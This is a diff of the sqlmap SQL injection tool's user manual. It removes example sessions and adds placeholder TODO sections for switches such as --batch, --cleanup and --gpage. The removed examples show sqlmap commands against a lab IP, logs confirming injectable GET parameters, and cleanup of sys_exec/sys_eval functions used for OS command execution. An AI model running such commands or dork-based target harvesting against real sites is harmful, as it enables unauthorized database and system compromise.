    If you want sqlmap to run as a batch tool, without any user's interaction -when sqlmap requires it, you can force it by using --batch -option, and leave sqlmap to go for a default behaviour. +when sqlmap requires it, you can force that by using +--batch switch. This will leave sqlmap to go with a +default behaviour whenever user's input would be required. + + +Miscellaneous + +TODO

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int_str.php?id=1&name=luther" \ - --batch -v 1 - -[...] -[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic -[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic -[hh:mm:22] [INFO] GET parameter 'id' is dynamic -[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis -[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id' -[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id' -[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis -[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic -[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic -[hh:mm:22] [INFO] GET parameter 'name' is dynamic -[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis -[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name' -[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable -[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name' -[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name' -[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis -[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go -ahead: -[0] place: GET, parameter: id, type: numeric (default) -[1] place: GET, parameter: name, type: stringsingle -[q] Quit -Choice: 0 -[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode -[...] -back-end DBMS: MySQL >= 5.0.0 - +Switch: --beep

    -As you can see, sqlmap by default chose the injection payload to the first -vulnerable parameter. +TODO -Cleanup the DBMS by sqlmap specific UDF(s) and table(s) +TODO + +

    +Switch: --check-payload + +

    +TODO + + +Cleanup the DBMS from sqlmap specific UDF(s) and table(s)

    Switch: --cleanup @@ -5613,30 +2802,57 @@ Switch: --cleanup

    It is recommended to clean up the back-end database management system from sqlmap temporary table(s) and created user-defined function(s) when you -are done with owning the underlying operating system or file system. +are done taking over the underlying operating system or file system. +Switch --cleanup will attempt to clean up the DBMS and +the file system wherever possible. + + +TODO

    -Example on a PostgreSQL 8.3.5 target: +Switch: --forms - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/iis/get_int.aspx?id=1" \ - -v 2 --cleanup +

    +TODO -[...] -[hh:mm:18] [INFO] cleaning up the database management system -[hh:mm:18] [DEBUG] removing support tables -[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapfile -[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapoutput -do you want to remove sys_exec UDF? [Y/n] -[hh:mm:20] [DEBUG] removing sys_exec UDF -[hh:mm:20] [DEBUG] query: DROP FUNCTION sys_exec(text) -do you want to remove sys_eval UDF? [Y/n] -[hh:mm:21] [DEBUG] removing sys_eval UDF -[hh:mm:21] [DEBUG] query: DROP FUNCTION sys_eval(text) -[hh:mm:21] [INFO] database management system cleanup finished -[hh:mm:21] [WARNING] remember that UDF shared library files saved on the file system can -only be deleted manually - + +Use Google dork results from specified page number + +

    +Switch: --gpage + +

    +Default sqlmap behavior with option -g is to do a Google +search and use the first 100 resulting URLs for further SQL injection +testing. However, in combination with this option you can specify with +this switch, --gpage, some page other than the first one +to retrieve target URLs from. + + +TODO + +

    +Switch: --parse-errors + +

    +TODO + + +TODO + +

    +Switch: --replicate + +

    +TODO + + +License and copyright + +

    +sqlmap is released under the terms of the +. +sqlmap is copyrighted by its . Disclaimer